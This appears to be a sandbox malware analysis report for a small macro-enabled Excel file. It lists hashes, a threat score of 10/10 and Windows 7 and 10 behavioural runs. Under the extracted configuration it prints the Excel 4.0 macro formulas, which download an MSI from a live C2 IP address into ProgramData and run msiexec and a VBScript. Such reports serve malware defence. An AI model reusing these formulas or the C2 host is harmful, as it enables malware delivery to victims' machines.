05214008799c4c7a442bc044e74f1978 | Triage

Submit
Reports

Overview

overview

Static

static

0521400879...8.xlsm

windows7-x64

0521400879...8.xlsm

windows10-2004-x64

Sharing

Copy URL Twitter E-mail

Static task

static1

Behavioral task

behavioral1

Sample

05214008799c4c7a442bc044e74f1978.xlsm

Resource

win7-20231215-en

windows7-x64

8 signatures

150 seconds

Behavioral task

behavioral2

Sample

05214008799c4c7a442bc044e74f1978.xlsm

Resource

win10v2004-20231215-en

windows10-2004-x64

6 signatures

150 seconds

General

Target

05214008799c4c7a442bc044e74f1978
Size

6KB
MD5

05214008799c4c7a442bc044e74f1978
SHA1

a44b11e7bbf1739bcbf2c699e59bd385fe682afc
SHA256

5cf64c2b31baef394062c56e0e40880988283b7f1dd5f7473a29105df4f69308
SHA512

e6240df97ddf9d4beed5c9be48d246574281d90276f390016352298d90e449efa3168808458bd001e60e4c45cb5f55c1c537e5ec0f0a89eac49dbdddd578b2e4
SSDEEP

192:NDS3uSL1aEOmmfRY8UhHFBFYuWb98yrebuX:NkuCwm1FYLb98yrOY

Score

10^/10

xlm

Malware Config

Extracted

Rule

Excel 4.0 XLM Macro

C2

http://46.17.98.187

Attributes

formulas
=EXEC("msiexec.exe") =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187","C:\ProgramData\uluculus.msi",0,0) =EXEC("wscript C:\ProgramData\start.vbs") =HALT()

Signatures

Files

05214008799c4c7a442bc044e74f1978
.xlsm office2007

© 2018-2025

Terms | Privacy